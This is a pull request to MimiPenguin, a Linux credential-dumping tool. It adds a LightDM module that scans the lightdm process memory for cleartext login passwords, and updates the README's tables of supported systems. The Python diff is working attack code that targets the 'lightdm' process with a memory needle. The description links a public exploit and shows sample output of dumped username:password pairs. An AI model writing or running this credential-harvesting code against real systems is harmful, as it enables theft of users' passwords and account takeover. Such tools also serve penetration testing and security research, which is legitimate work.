### PR TITLE
Add support for LightDM

### DIFF
--- a/README.md
+++ b/README.md
@@ -37,7 +37,7 @@ MimiPenguin is slowly being ported to multiple languages to support all possible
 |---------------------------------------------------|-----|-----|
 | GDM password (Kali Desktop, Debian Desktop)       | ~   | X   |
 | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | X   | X   |
-| LightDM (Ubuntu Desktop)                          | X   |     |
+| LightDM (Ubuntu Desktop)                          | X   | X   |
 | VSFTPd (Active FTP Connections)                   | X   | X   |
 | Apache2 (Active HTTP Basic Auth Sessions)         | ~   | ~   |
 | OpenSSH (Active SSH Sessions - Sudo Usage)        | ~   | ~   |

--- a/README.md
+++ b/README.md
@@ -12,7 +12,9 @@ Takes advantage of cleartext credentials in memory by dumping the process and ex
 ## Supported/Tested Systems
 * Kali 4.3.0 (rolling) x64 (gdm3)
 * Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
+* Ubuntu Desktop 14.04.1 LTS x64 (Gnome Keyring 3.10.1-1ubuntu4.3, LightDM 1.10.6-0ubuntu1)
 * Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
+* Ubuntu Desktop 16.04.4 LTS x64 (LightDM 1.18.3-0ubuntu1.1)
 * XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
 * Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
 * OpenSUSE Leap 42.2 x64 (Gnome Keyring 3.20)
@@ -35,6 +37,7 @@ MimiPenguin is slowly being ported to multiple languages to support all possible
 |---------------------------------------------------|-----|-----|
 | GDM password (Kali Desktop, Debian Desktop)       | ~   | X   |
 | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | X   | X   |
+| LightDM (Ubuntu Desktop)                          | X   |     |
 | VSFTPd (Active FTP Connections)                   | X   | X   |
 | Apache2 (Active HTTP Basic Auth Sessions)         | ~   | ~   |
 | OpenSSH (Active SSH Sessions - Sudo Usage)        | ~   | ~   |

--- a/mimipenguin.py
+++ b/mimipenguin.py
@@ -183,6 +183,12 @@ class GnomeKeyringPasswordFinder(PasswordFinder):
         self._target_processes = ['gnome-keyring-daemon']
         self._needles = [r'^.+libgck\-1\.so\.0$', r'libgcrypt\.so\..+$']
 
+class LightDmPasswordFinder(PasswordFinder):
+    def __init__(self):
+        PasswordFinder.__init__(self)
+        self._source_name = '[SYSTEM - LIGHTDM]'
+        self._target_processes = ['lightdm']
+        self._needles = [r'^_pammodutil_getspnam_']
 
 class VsftpdPasswordFinder(PasswordFinder):
     def __init__(self):
@@ -242,6 +248,8 @@ def main():
         password_finders.append(GdmPasswordFinder())
     if find_pid('gnome-keyring-daemon'):
         password_finders.append(GnomeKeyringPasswordFinder())
+    if find_pid('lightdm'):
+        password_finders.append(LightDmPasswordFinder())
     if os.path.isfile('/etc/vsftpd.conf'):
         password_finders.append(VsftpdPasswordFinder())
     if os.path.isfile('/etc/ssh/sshd_config'):


### PR DESCRIPTION
Add support for LightDM.

Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS.

Based on this [exploit](https://gist.github.com/bcoles/7d22615a3355bae8ebd6373c9d476548).

Which is based on the [original report and PoC](https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490) by Sven Blumenstein.


### Output

#### Ubuntu 14.04.1 LTS

```
# ./mimipenguin.sh 
MimiPenguin Results:
[SYSTEM - GNOME]			test:secretpw
[SYSTEM - GNOME]			user:password
[SYSTEM - LIGHTDM]			test:secretpw 
[SYSTEM - LIGHTDM]			user:password 
```


#### Ubuntu 16.04.4 LTS

```
# ./mimipenguin.sh 
MimiPenguin Results:
[SYSTEM - LIGHTDM]			test:secretpw 
[SYSTEM - LIGHTDM]			user:password 
```
